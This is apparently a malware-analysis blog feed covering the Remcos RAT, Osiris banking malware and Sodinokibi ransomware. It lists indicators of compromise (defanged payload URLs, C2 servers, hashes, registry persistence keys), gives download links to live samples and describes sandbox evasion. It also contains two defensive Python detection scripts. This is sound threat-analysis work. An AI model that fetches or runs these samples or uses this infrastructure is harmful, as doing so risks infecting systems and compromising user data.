<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">www</span><span class="p">.</span><span class="n">kutrialiogludernegi</span><span class="p">[.]</span><span class="n">com</span><span class="o">/</span><span class="n">cgi</span><span class="o">-</span><span class="n">bin</span><span class="o">/</span><span class="mi">6</span><span class="n">j1</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">poshinternationalmedia</span><span class="p">[.]</span><span class="n">com</span><span class="o">/</span><span class="n">nqec</span><span class="o">/</span><span class="n">zcdvgy178</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">drfalamaki</span><span class="p">[.]</span><span class="n">com</span><span class="o">/</span><span class="n">Mqm24</span><span class="o">/</span><span class="n">btxz33664</span><span class="o">/</span>
<span class="n">hxxps</span><span class="p">:</span><span class="o">//</span><span class="n">gcsucai</span><span class="p">[.]</span><span class="n">com</span><span class="o">/</span><span class="n">wp</span><span class="o">-</span><span class="n">content</span><span class="o">/</span><span class="n">h891u8f8</span><span class="o">/</span>
</pre></div>
<h3>Contacted Servers</h3>
<div class="highlight"><pre><span></span><span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">179</span><span class="p">.</span><span class="mi">12</span><span class="p">.</span><span class="mi">170</span><span class="p">[.]</span><span class="mi">88</span><span class="p">:</span><span class="mi">8080</span><span class="o">/</span><span class="n">vermont</span><span class="o">/</span><span class="n">json</span><span class="o">/</span><span class="n">ringin</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">182</span><span class="p">.</span><span class="mi">76</span><span class="p">.</span><span class="mi">6</span><span class="p">[.]</span><span class="mi">2</span><span class="p">:</span><span class="mi">8080</span><span class="o">/</span><span class="n">sess</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">86</span><span class="p">.</span><span class="mi">98</span><span class="p">.</span><span class="mi">25</span><span class="p">[.]</span><span class="mi">30</span><span class="p">:</span><span class="mi">53</span><span class="o">/</span><span class="n">ringin</span><span class="o">/</span><span class="n">attrib</span><span class="o">/</span><span class="n">ringin</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">198</span><span class="p">.</span><span class="mi">199</span><span class="p">.</span><span class="mi">88</span><span class="p">[.]</span><span class="mi">162</span><span class="p">:</span><span class="mi">8080</span><span class="o">/</span><span class="n">sym</span><span class="o">/</span><span class="n">codec</span><span class="o">/</span><span class="n">ringin</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">178</span><span class="p">.</span><span class="mi">62</span><span class="p">.</span><span class="mi">37</span><span class="p">[.]</span><span class="mi">188</span><span class="p">:</span><span class="mi">443</span><span class="o">/</span><span class="n">health</span><span class="o">/</span><span class="n">enabled</span><span class="o">/</span><span class="n">ringin</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">92</span><span class="p">.</span><span class="mi">222</span><span class="p">.</span><span class="mi">125</span><span class="p">[.]</span><span class="mi">16</span><span class="p">:</span><span class="mi">7080</span><span class="o">/</span><span class="n">acquire</span><span class="o">/</span><span class="n">loadan</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">45</span><span class="p">.</span><span class="mi">79</span><span class="p">.</span><span class="mi">188</span><span class="p">.</span><span class="mi">67</span><span class="p">:</span><span class="mi">8080</span><span class="o">/</span><span class="n">report</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">45</span><span class="p">.</span><span class="mi">79</span><span class="p">.</span><span class="mi">188</span><span class="p">.</span><span class="mi">67</span><span class="p">:</span><span class="mi">8080</span><span class="o">/</span><span class="n">stubs</span><span class="o">/</span><span class="k">schema</span><span class="o">/</span><span class="n">ringin</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">173</span><span class="p">.</span><span class="mi">214</span><span class="p">.</span><span class="mi">174</span><span class="p">[.]</span><span class="mi">107</span><span class="p">:</span><span class="mi">443</span><span class="o">/</span><span class="n">whoami</span><span class="p">.</span><span class="n">php</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">173</span><span class="p">.</span><span class="mi">214</span><span class="p">.</span><span class="mi">174</span><span class="p">[.]</span><span class="mi">107</span><span class="p">:</span><span class="mi">443</span><span class="o">/</span><span class="n">xian</span><span class="o">/</span><span class="n">vermont</span><span class="o">/</span><span class="n">ringin</span><span class="o">/</span><span class="n">merge</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">173</span><span class="p">.</span><span class="mi">214</span><span class="p">.</span><span class="mi">174</span><span class="p">[.]</span><span class="mi">107</span><span class="p">:</span><span class="mi">443</span><span class="o">/</span><span class="n">symbols</span><span class="o">/</span><span class="n">enable</span><span class="o">/</span><span class="n">ringin</span><span class="o">/</span>
</pre></div>
<p></br></p>
<h2>Malicious RATatouille</h2>
<p>f0wL, 2019-09-07 (tag:dissectingmalwa.re,2019-09-07:/malicious-ratatouille.html)</p>
<p>Remcos is a commercially sold Remote Administration Toolkit (RAT) that is regularly distributed as spyware.</p><p>Depending on the licensing model and capabilities, Remcos is sold for $58 to $389 by the company (with the rather fitting name) Breaking Security. Feature-wise, the manufacturer's website lists: Remote Administration, Support, Surveillance, Anti-Theft and Proxy. In most cases the executable is dropped via a booby-trapped Office or XML document. Of course I will not link to any of their webpages or products, since shilling for cybercriminals would be the last thing I'd do.</p>
<p></br></p>
<p><img alt="Title Picture" src="https://dissectingmalwa.re/img/remcos-title.png"></p>
<p></br></p>
<p>Inspiration for this blog post came from @wwp96 on Twitter:</p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr"><a href="https://twitter.com/hashtag/remcos?src=hash&ref_src=twsrc%5Etfw">#remcos</a><br><br>jkharding2014.myddns[.]rocks<br>tomharry.ddns[.]net<br><br>2c8b1cca4ee54428dffc203b76c4dc30 - Dhl protected.iso<br>06469856a9bdecae989b64daf9db09c7 - carved exe<a href="https://t.co/YtsJYbhle9">https://t.co/YtsJYbhle9</a></p>— wwp96 (@wwp96) <a href="https://twitter.com/wwp96/status/1170332469960331266?ref_src=twsrc%5Etfw">September 7, 2019</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></center></p>
<p></br></p>
<p>Remcos uses a Control instance (the C&amp;C) and the so-called Agent (the executable that is delivered to the victim). It was first spotted in 2016, when it was being sold on HackForums. Since then it has been used in targeted attacks (mostly spear-phishing) against Turkish government/military contractors and other businesses and individuals in the European Union. The Agent is written in C++ (while the Control application is written in Borland Delphi) and is 110 KB in size. Click here for the <a href="https://app.any.run/tasks/8c9c6779-0f98-4ab4-b28c-1154f7b489eb/">AnyRun Analysis</a>.</p>
<p></br></p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/remcos-reg1.png"></center></p>
<p></br></p>
<p>Of course it fiddles around in the registry as well. It uses the Key in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run to bind to the system startup.</p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/remcos-die.png"></center></p>
<p>Although there are versions of Remcos that are packed with UPX and MPRESS1 this sample is not obfuscated in any way.</p>
<p></br></p>
<p><center><img alt="DNS Queries" src="https://dissectingmalwa.re/img/remcos-dns.png"></center></p>
<p></br></p>
<p>In terms of network interactions it queries two Dynamic DNS URLs that both point to the same host at <em>66.154.113[.]142</em>.</p>
<p></br></p>
<p><center><img alt="Remcos Version" src="https://dissectingmalwa.re/img/remcos-version.png"></center></p>
<p></br></p>
<p>With Version 1.7 Pro we've got an old version of the RAT in our hands, which dates back to the 5th of January 2017. The most recent version of the malware according to the changelog is V2.4.7. Another thing one usually doesn't get with malware: a 31-page manual. It goes over the features and configuration points the malware has to offer and even includes a "Terms of Service" chapter which states that <em>users have to be notified that there is surveillance software in place</em> and that <em>the use of remcos for illegal activities</em> is forbidden. As if they would care that their software was probably used in >95% of malicious acts. Judging by the typos and a few screenshots I'd attribute this malware to Eastern European threat actors.</p>
<p></br></p>
<p><center><img alt="Remcos Manual" src="https://dissectingmalwa.re/img/remcos-manual.png"></center></p>
<p></br></p>
<p>The following Screenshots were captured after decompiling the executable with the retargetable Decompiler <a href="https://retdec.com/">retdec</a> by Avast. The decompiled result can be found <a href="https://dissectingmalwa.re/other/remcos.c">here</a>.</p>
<p></br></p>
<p><center><img alt="Remcos Install" src="https://dissectingmalwa.re/img/remcos-install.png"></center></p>
<p></br></p>
<p>As a first step it runs its dropped install script called <em>install.bat</em> and uses a ping to localhost to stall the process and make sure it is finished before proceeding.</p>
<p></br></p>
<p><center><img alt="Remcos VBox Detection" src="https://dissectingmalwa.re/img/remcos-virtualbox.png"></center></p>
<p><center><img alt="Remcos Sandboxie Detection" src="https://dissectingmalwa.re/img/remcos-sandboxie.png"></center></p>
<p></br></p>
<p>In terms of evasion techniques Remcos turns up with detection methods for both VirtualBox and Sandboxie. The above example shows the method it employs for VirtualBox via a registry key that is set if the Guest Additions are in place on the guest system. In the same manner it tries to call <em>SbieDll.dll</em> to check if Sandboxie is present.</p>
<p></br></p>
<p><center><img alt="Remcos C2" src="https://dissectingmalwa.re/img/remcos-c2.png"></center></p>
<p></br></p>
<p>The Remcos Agent also has debugging functionality via a console window, for example for the communication with the C&C Server.</p>
<p></br></p>
<p><center><img alt="Remcos Mutex" src="https://dissectingmalwa.re/img/remcos-mutex.png"></center></p>
<p></br></p>
<p>Remcos also employs Process Injection via a static Mutex. This behaviour is often used as a simple way of achieving persistence and to decrease the risk of a possible detection. Most versions of the RAT seem to inject into <em>svchost.exe</em>.</p>
<p></br></p>
<p><center><img alt="Remcos Options" src="https://dissectingmalwa.re/img/remcos-options.png"></center></p>
<p></br></p>
<p>Via the command & control structure we also get a pretty good look at all the features the malware supports. In this screenshot we can see the file operations, process manipulations and window interactions it has to offer to the operator. </p>
<p></br></p>
<p><center><img alt="Remcos Firefox" src="https://dissectingmalwa.re/img/remcos-firefox.png"></center></p>
<p></br></p>
<p>Another "standard" feature for RATs is accessing Browser History, cache and password stores. In this case Remcos is trying to manipulate user data in Mozilla Firefox.</p>
<p></br></p>
<p><center><img alt="Remcos Camera" src="https://dissectingmalwa.re/img/remcos-camera.png"></center></p>
<p></br></p>
<p>We also get a look at the webcam capture module of the RAT, which seems to support different camera modes. Additionally it also supports audio capture via a built-in microphone. </p>
<p></br></p>
<p><center><img alt="Remcos Shutdown" src="https://dissectingmalwa.re/img/remcos-shutdown.png"></center></p>
<p></br></p>
<p>Lastly the malware also has the capability to manipulate the system power state depending on the current privileges. </p>
<p>Although Remcos is not a "new" malware by today's definition it is still a serious threat to look out for. In my test it scores <em>53/68</em> on <a href="https://www.virustotal.com/gui/file/1c3a298dd32da9de457842613dd4f07e0e57131a94bc13d868ffcbbebfab6d63/detection">VirusTotal</a>.</p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>Remcos RAT (SHA256)</h3>
<div class="highlight"><pre><span></span><span class="mi">1</span><span class="n">c3a298dd32da9de457842613dd4f07e0e57131a94bc13d868ffcbbebfab6d63</span>
<span class="mi">11535</span><span class="n">ea0ba3bf9ed0691b850955ef2613475dfdce7d8a32fa3d2d7ae066de73d</span>
</pre></div>
<h3>C&C URLs</h3>
<div class="highlight"><pre><span></span><span class="n">httx</span><span class="p">:</span><span class="o">//</span><span class="n">tomharry</span><span class="p">.</span><span class="n">ddns</span><span class="p">[.]</span><span class="n">net</span>
<span class="n">httx</span><span class="p">:</span><span class="o">//</span><span class="n">jkharding2014</span><span class="p">.</span><span class="n">myddns</span><span class="p">[.]</span><span class="n">rocks</span>
<span class="n">httx</span><span class="p">:</span><span class="o">//</span><span class="n">gratefulheart</span><span class="p">.</span><span class="n">ddns</span><span class="p">[.]</span><span class="n">net</span>
<span class="n">httx</span><span class="p">:</span><span class="o">//</span><span class="n">uaeoffice999</span><span class="p">.</span><span class="n">warzonedns</span><span class="p">[.]</span><span class="n">com</span>
</pre></div>
<h3>IPs</h3>
<div class="highlight"><pre><span></span><span class="mi">66</span><span class="p">.</span><span class="mi">154</span><span class="p">.</span><span class="mi">113</span><span class="p">[.]</span><span class="mi">142</span>
<span class="mi">79</span><span class="p">.</span><span class="mi">134</span><span class="p">.</span><span class="mi">225</span><span class="p">[.]</span><span class="mi">77</span>
<span class="mi">79</span><span class="p">.</span><span class="mi">134</span><span class="p">.</span><span class="mi">225</span><span class="p">[.]</span><span class="mi">81</span>
</pre></div>
<h3>Modified Registry Keys</h3>
<div class="highlight"><pre><span></span><span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">CurrentVersion</span><span class="err">\</span><span class="n">Run</span>
<span class="n">remcos</span> <span class="c1">--> "C:\Users\admin\AppData\Roaming\remcos\remcos.exe" </span>
<span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">CurrentVersion</span><span class="err">\</span><span class="n">Internet</span> <span class="n">Settings</span><span class="err">\</span><span class="n">ZoneMap</span>
<span class="n">UNCAsIntranet</span> <span class="c1">--> 0</span>
<span class="n">AutoDetect</span> <span class="c1">--> 1</span>
</pre></div>
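<p>As an added example (not part of the original post or of Remcos itself), the following Python script parses a Windows .reg export and flags the two persistence-related changes listed above: an autorun entry pointing into %APPDATA%\Roaming and the ZoneMap values. The sample export embedded in it is constructed, and the function and constant names are my own.</p>

```python
import re

# Constructed .reg export (not from the blog's sandbox run), shaped like the
# registry changes the post lists: a Run-key entry pointing into
# %APPDATA%\Roaming plus the two ZoneMap values.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"remcos"="\"C:\\Users\\admin\\AppData\\Roaming\\remcos\\remcos.exe\""

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet"=dword:00000000
"AutoDetect"=dword:00000001
'''

RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
ZONEMAP_KEY = (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion"
               r"\Internet Settings\ZoneMap")


def _unescape_reg_string(s: str) -> str:
    # .reg files escape backslashes and double quotes inside string values
    return re.sub(r'\\(["\\])', r"\1", s)


def parse_reg_export(text: str) -> dict:
    """Parse the .reg text format into {key_path: {value_name: value}}.
    Quoted strings and dword values are decoded; other types stay as text."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        if current is None:
            continue
        m = re.match(r'^(?:"((?:[^"\\]|\\.)*)"|(@))=(.*)$', line)
        if not m:
            continue
        name = m.group(1) if m.group(1) is not None else "(Default)"
        value = m.group(3)
        if value.startswith("dword:"):
            keys[current][name] = int(value[len("dword:"):], 16)
        elif len(value) >= 2 and value[0] == '"' and value[-1] == '"':
            keys[current][name] = _unescape_reg_string(value[1:-1])
        else:
            keys[current][name] = value  # hex(...) and friends left as-is
    return keys


def _image_path(command: str) -> str:
    """Extract the executable path from a Run-key command line."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:].split('"', 1)[0]
    return command.split(" ", 1)[0]


def find_remcos_indicators(keys: dict) -> list:
    """Return (finding, where, detail) tuples for the changes the post lists."""
    findings = []
    for name, command in keys.get(RUN_KEY, {}).items():
        path = _image_path(command).lower()
        # The sample persists as %APPDATA%\Roaming\remcos\remcos.exe; any
        # autorun executable living in the roaming profile deserves a look.
        if "\\appdata\\roaming\\" in path and path.endswith(".exe"):
            findings.append(("run_key_roaming_exe", name, path))
    zonemap = keys.get(ZONEMAP_KEY, {})
    if zonemap.get("UNCAsIntranet") == 0 and zonemap.get("AutoDetect") == 1:
        findings.append(("zonemap_values_match_post", ZONEMAP_KEY,
                         "UNCAsIntranet=0, AutoDetect=1"))
    return findings


if __name__ == "__main__":
    for finding in find_remcos_indicators(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(*finding, sep=" | ")
```

To audit a real host, export the two keys with <code>reg export</code> and feed the resulting file to <code>parse_reg_export</code> instead of the constructed sample.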
<p></br></p>Osiris, the god of afterlife...and banking malware?!2019-08-29T00:00:00+02:002019-08-29T00:00:00+02:00f0wLtag:dissectingmalwa.re,2019-08-29:/osiris-the-god-of-afterlifeand-banking-malware.html<p>After coming back from the Chaos Communication Camp two days ago I thought it would be a good idea to check on the current malware events out there, so come along for the ride</p><p>I came across this sample after this tweet by @James_inthe_box:</p>
<p></br></p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr">Found by <a href="https://twitter.com/FewAtoms?ref_src=twsrc%5Etfw">@FewAtoms</a> at:<br>borel[.]fr/notices/CanadaPost.zip -> vbs drops:<br>https://naot[.]org/cms/file/fixed111.exe<br><br>I'd like to say with confidence: I have no idea what this is. <a href="https://t.co/z18z17Kau8">https://t.co/z18z17Kau8</a> <a href="https://t.co/68zg3HpkRI">pic.twitter.com/68zg3HpkRI</a></p>— James (@James_inthe_box) <a href="https://twitter.com/James_inthe_box/status/1166733718423138304?ref_src=twsrc%5Etfw">August 28, 2019</a></blockquote></center></p>
<p></br></p>
<p><center><img alt="Properties of the Executable" src="https://dissectingmalwa.re/img/osiris-fileprop.png"></center>
</br></p>
<h4><em>A short disclaimer: downloading and running the samples linked below will compromise your computer and data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<h3>Get your sample today from:</h3>
<p>Osiris available @ <a href="https://malshare.com/sample.php?action=detail&hash=9f4d8bd1cba2681f3bcf642f56342ac7">https://malshare.com/sample.php?action=detail&hash=9f4d8bd1cba2681f3bcf642f56342ac7</a>
<code>sha256 0325714eeb2af235a0f543ad9e11b5d852a61be78c9ece308c651412d97edd39</code>
</br>
</br>
<center><img alt="Dropped files in %APPDATA%\Roaming" src="https://dissectingmalwa.re/img/osiris-roaming.png"></center>
</br>
<center><p>Files dropped in %APPDATA%\Roaming</p></center>
</br>
</br>
<center><img alt="Dropped files in %APPDATA%\Local\Temp" src="https://dissectingmalwa.re/img/osiris-temp.png"></center>
</br>
<center><p>Files dropped in %temp%</p></center>
</br>
</br>
<center><img alt="Binding for System Startup" src="https://dissectingmalwa.re/img/osiris-startup.png"></center>
</br>
</br>
After running the sample for the first time it adds itself to system startup and copies itself to <em>%appdata%\Roaming\Microsoft\Windows\Protected\setspn.exe</em>. When comparing the malicious setspn.exe with the Microsoft original (which is normally found at C:\Windows\System32\setspn.exe) in PE-bear, it is obvious that the files are not the same.</p>
<p><center><img alt="Dropped files in %APPDATA%\Roaming" src="https://dissectingmalwa.re/img/osiris-setspn.png"></center></p>
<p>To jump straight to the <em>Hybrid-Analysis</em> report for fixed111.exe click <a href="https://www.hybrid-analysis.com/sample/0325714eeb2af235a0f543ad9e11b5d852a61be78c9ece308c651412d97edd39/5d6677f3038838a982e5752c">here</a>. I picked out a couple of interesting findings for you:
</br>
</br>
<center><img alt="Hybrid-Analysis IR" src="https://dissectingmalwa.re/img/osiris-ha.png"></center>
</br>
</br>
</br>
One thing that stands out is that Osiris uses components of the Nullsoft Scriptable Install System (NSIS). I did not look into it that far yet, but it seems like it is used for a headless install only.
</br>
</br>
<center><img alt="Hybrid-Analysis Mini-Tor" src="https://dissectingmalwa.re/img/osiris-minitor.png"></center>
</br>
A quite interesting find: this Osiris sample uses a PoC implementation called <a href="https://github.com/wbenny/mini-tor">Mini-Tor</a> for communication with the Tor network. Pretty convenient for the malware author as it keeps the size of the binary small, but still allows data exfiltration over an anonymized protocol.</p>
<p>Click here for the <a href="https://app.any.run/tasks/99d3a922-0bec-4680-a65f-376302315311/">Any.Run</a> analysis.
</br>
<center><img alt="AnyRun HTTP Requests" src="https://dissectingmalwa.re/img/osiris-http.png"></center>
</br></p>
<p>When the <a href="https://twitter.com/James_inthe_box/status/1166733718423138304">Twitter discussion</a> about this sample started, multiple theories about the Tor requests were brought up. My explanation for this behaviour is that the malware is exfiltrating data over the Tor network. Because of the URL format of the requested sites, <em>IPAddress/tor/servers/fp/-HASH-</em>, one can assume that the contacted servers are <em>Directory Servers</em> which hold the <a href="https://stem.torproject.org/api/descriptor/server_descriptor.html">Server Descriptor</a> files for known nodes. This is why I'd classify this behaviour as more or less standard client communication.</p>
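<p>The directory-server theory above can be checked against proxy logs. The following Python is an added example, not code from the original post: it groups requests to Tor directory-protocol paths (descriptor fetches by fingerprint, consensus and key downloads) per client and flags clients that talk to several directory servers. The log lines and IP addresses are constructed, and the accepted path spellings are an assumption noted in the code.</p>

```python
import re
from collections import defaultdict

# Constructed proxy-log lines (not from the blog's sandbox run) in a simple
# "timestamp client method url" layout; addresses are documentation ranges.
SAMPLE_LOG = """\
2019-08-29T10:00:01 10.0.0.5 GET http://192.0.2.1/tor/server/fp/0123456789abcdef0123456789abcdef01234567
2019-08-29T10:00:02 10.0.0.5 GET http://203.0.113.9/tor/server/fp/89abcdef0123456789abcdef0123456789abcdef
2019-08-29T10:00:03 10.0.0.5 GET http://198.51.100.7/tor/servers/fp/fedcba9876543210fedcba9876543210fedcba98
2019-08-29T10:00:04 10.0.0.5 GET http://example.org/index.html
2019-08-29T10:00:05 10.0.0.6 GET http://198.51.100.7/tor/status-vote/current/consensus
2019-08-29T10:00:06 10.0.0.6 GET http://203.0.113.9/tor/keys/all
"""

LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)$")

# Tor directory-protocol paths. The post writes the descriptor path as
# /tor/servers/fp/, the Tor directory spec uses /tor/server/fp/; both spellings
# are accepted here (assumption). A descriptor fetch names a 40-hex-digit
# relay fingerprint; consensus and key downloads are counted separately.
TOR_DIR_PATH = re.compile(
    r"^https?://(?P<host>[^/]+)/tor/"
    r"(?:servers?/fp/(?P<fp>[0-9a-fA-F]{40})"
    r"|(?P<other>status-vote/|keys/|micro/))"
)


def parse_log(text: str):
    """Yield one dict per well-formed log line."""
    for raw in text.splitlines():
        m = LOG_LINE.match(raw.strip())
        if m:
            yield m.groupdict()


def tor_directory_activity(text: str) -> dict:
    """Group Tor directory-protocol requests by client address."""
    activity = defaultdict(lambda: {"hosts": set(), "fingerprints": [], "other": 0})
    for rec in parse_log(text):
        m = TOR_DIR_PATH.match(rec["url"])
        if not m:
            continue  # ordinary web traffic
        entry = activity[rec["client"]]
        entry["hosts"].add(m.group("host"))
        if m.group("fp"):
            entry["fingerprints"].append(m.group("fp").lower())
        else:
            entry["other"] += 1
    return dict(activity)


def flag_tor_clients(text: str, min_hosts: int = 2) -> dict:
    """Return clients that fetched directory data from at least min_hosts
    distinct directory servers, the pattern a Tor client bootstrapping shows."""
    flagged = {}
    for client, entry in tor_directory_activity(text).items():
        if len(entry["hosts"]) >= min_hosts:
            flagged[client] = {
                "directory_hosts": sorted(entry["hosts"]),
                "descriptors": len(entry["fingerprints"]),
                "other_requests": entry["other"],
            }
    return flagged


if __name__ == "__main__":
    for client, info in flag_tor_clients(SAMPLE_LOG).items():
        print(client, info)
```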
<p></br>
<center><img alt="AnyRun Threats" src="https://dissectingmalwa.re/img/osiris-threats.png"></center>
</br>
</br></p>
<h2><em>IOCs</em></h2>
<h3>URLs</h3>
<div class="highlight"><pre><span></span><span class="n">httpx</span><span class="p">:</span><span class="o">//</span><span class="n">naot</span><span class="p">[.]</span><span class="n">org</span><span class="o">/</span><span class="n">cms</span><span class="o">/</span><span class="n">file</span><span class="o">/</span><span class="n">fixed111</span><span class="p">.</span><span class="n">exe</span>
<span class="n">httpx</span><span class="p">:</span><span class="o">//</span><span class="n">borel</span><span class="p">[.]</span><span class="n">fr</span><span class="o">/</span><span class="n">notices</span><span class="o">/</span><span class="n">CanadaPost</span><span class="p">.</span><span class="n">zip</span>
</pre></div>GermanWiper's big Brother? GandGrab's kid ? Sodinokibi!2019-08-10T00:00:00+02:002019-08-10T00:00:00+02:00f0wLtag:dissectingmalwa.re,2019-08-10:/germanwipers-big-brother-gandgrabs-kid-sodinokibi.html<p>After last week's analysis of GermanWiper I thought it would be about time to have a look at Sodinokibi aka REvil, the new weird kid on the block.</p><p></br>
<img alt="Background" src="https://dissectingmalwa.re/img/sodi-bg.png">
</br>
</br></p>
<p>According to <a href="https://www.cybereason.com/blog/the-sodinokibi-ransomware-attack">Cybereason</a> the Sodinokibi Ransomware was written by the same guys who created GandCrab, which is a pretty big deal after GandCrab retired recently. The samples that I'll be looking at today were first dropped in Asia, but it did not take long to reach other continents as well.</p>
<h4><em>A general disclaimer as always: downloading and running the samples linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<h3>Where I dug up the samples this time:</h3>
<p>Sodinokibi #1 available @ <a href="https://malshare.com/sample.php?action=detail&hash=6cb6fda0b353d411a30c5b945e53ea52">https://malshare.com/sample.php?action=detail&hash=6cb6fda0b353d411a30c5b945e53ea52</a>
<code>sha256 bace25c1ec587d099b4c566b1a07978dd9cb3bd67c2acaa55d2e4644a7877070</code></p>
<p>Sodinokibi #2 available @ <a href="https://malshare.com/sample.php?action=detail&hash=7354af1a63f222ede4c9e0a6f84d57c2">https://malshare.com/sample.php?action=detail&hash=7354af1a63f222ede4c9e0a6f84d57c2</a>
<code>sha256 2fea45f7be7c7313ee6e4fe7ad9ef64d9966a2391003a00dcbbd6214e9c522ef</code></p>
<p><img alt="Running Sodinokibi" src="https://dissectingmalwa.re/img/sodi-run.png"></p>
<p>Running it through VirusTotal we get a pretty good detection rate, but that is to be expected since REvil has been around for a few days already. Here's a direct link to the <a href="https://www.virustotal.com/gui/file/bace25c1ec587d099b4c566b1a07978dd9cb3bd67c2acaa55d2e4644a7877070/detection">VT Analysis</a>.
</br>
</br>
</br>
<img alt="VT Analysis" src="https://dissectingmalwa.re/img/sodi-vt.png">
</br>
</br>
</br>
Looking at Detect it easy we don't see anything special either. The PE seems to be built with MS Visual Studio 2015 (Linker Version 14).
<center><img alt="Detect it easy - Info" src="https://dissectingmalwa.re/img/sodi-die.png"></center></p>
<p>Entropy-wise we can observe a huge drop near the end of the binary.
<center><img alt="Detect it easy - Entropy" src="https://dissectingmalwa.re/img/sodi-entropy.png"></center></p>
<p><img alt="Running Sodinokibi" src="https://dissectingmalwa.re/img/sodi-bear-FileHeader.png">
</br>
</br>
</br>
The imports definitely indicate that something is wrong here. Only loading kernel32.dll with 3 entries is a bit minimalistic for ransomware.
</br>
</br>
</br>
<img alt="Running Sodinokibi" src="https://dissectingmalwa.re/img/sodi-bear-Imports.png">
</br>
</br>
</br>
To get one's hands on the actual PE with an intact/complete IAT there are a couple of possible ways. Sergei Frankoff explained a very fast, but slightly "messy" method on OALive. I'll try to replay this technique and plan to come back to this sample soon to try and script my way out of this hole.
</br>
</br>
<center><iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/0raUaL4TIo4" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></center>
</br>
</br>
</br>
<center><img alt="Loading REvil into x32dbg" src="https://dissectingmalwa.re/img/sodi-x32dbg.png"></center></p>
<p>A dump of the strings in the binary file can be found <a href="https://dissectingmalwa.re/other/sodi-strings.txt">here</a>. Likewise a sample of the ransom note dropped as a text file by the malware is available <a href="https://dissectingmalwa.re/other/sodi-note.txt">here</a>.
</br>
</br></p>
<h2>The Decryptor</h2>
<p></br>
Thanks to a businessman who shall remain nameless but decided to pay the ransom we can take a look at the Decryptor V1.3 as well. My feeling about this executable is that it is built to order rather than prepared in advance in case a decryption is requested. The tool feels relatively unpolished, with its debug console left active and no obfuscation or anti-evasion measures.
</br>
</br>
<center><img alt="The GUI of the Decryptor" src="https://dissectingmalwa.re/img/sodidec-gui.png"></center></p>
<p></br></p>
<p><center><img alt="The Debug Console of the Decryptor" src="https://dissectingmalwa.re/img/sodidec-cons.png"></center></p>
<p></br>
Running it through Detect it Easy there is nothing spectacular going on here. Consistent with the ransomware itself the decryptor was built with Visual Studio 2015 as well. Entropy-wise there are no surprises either at <em>4.64889</em>. </p>
<p><img alt="Running Sodinokibi" src="https://dissectingmalwa.re/img/sodidec-die.png"></p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>Sodinokibi / REvil Ransomware (SHA256)</h3>
<div class="highlight"><pre><span></span><span class="n">bace25c1ec587d099b4c566b1a07978dd9cb3bd67c2acaa55d2e4644a7877070</span>
<span class="mi">2</span><span class="n">fea45f7be7c7313ee6e4fe7ad9ef64d9966a2391003a00dcbbd6214e9c522ef</span>
<span class="n">ada9794bcc8e87af05f9982522e26f7ead3d1cb07bb76ce58fac1bf98e41cf53</span>
</pre></div>
<h3>URLs</h3>
<div class="highlight"><pre><span></span><span class="n">httx</span><span class="p">:</span><span class="o">//</span><span class="n">decryptor</span><span class="p">[.]</span><span class="n">top</span>
<span class="n">httx</span><span class="p">:</span><span class="o">//</span><span class="n">aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd</span><span class="p">.</span><span class="n">onion</span>
</pre></div>
